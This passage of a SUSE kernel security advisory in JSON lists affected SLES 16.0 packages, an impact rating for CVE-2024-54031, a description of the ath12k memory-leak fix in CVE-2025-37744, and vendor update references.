"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2024-54031"
},
{
"cve": "CVE-2025-37744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_pci_remove()\n\nKmemleak reported this error:\n\n unreferenced object 0xffff1c165cec3060 (size 32):\n comm \"insmod\", pid 560, jiffies 4296964570 (age 235.596s)\n backtrace:\n [\u003c000000005434db68\u003e] __kmem_cache_alloc_node+0x1f4/0x2c0\n [\u003c000000001203b155\u003e] kmalloc_trace+0x40/0x88\n [\u003c0000000028adc9c8\u003e] _request_firmware+0xb8/0x608\n [\u003c00000000cad1aef7\u003e] firmware_request_nowarn+0x50/0x80\n [\u003c000000005011a682\u003e] local_pci_probe+0x48/0xd0\n [\u003c00000000077cd295\u003e] pci_device_probe+0xb4/0x200\n [\u003c0000000087184c94\u003e] really_probe+0x150/0x2c0\n\nThe firmware memory was allocated in ath12k_pci_probe(), but not\nfreed in ath12k_pci_remove() in case ATH12K_FLAG_QMI_FAIL bit is\nset. So call ath12k_fw_unmap() to free the memory.\n\nTested-on: WCN7850 hw2.0 PCI WLAN.HMT.2.0-02280-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37744",
"url": "https://www.suse.com/security/cve/CVE-2025-37744"
},
{
"category": "external",
"summary": "SUSE Bug 1243662 for CVE-2025-37744",
"url": "https://bugzilla.suse.com/1243662"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
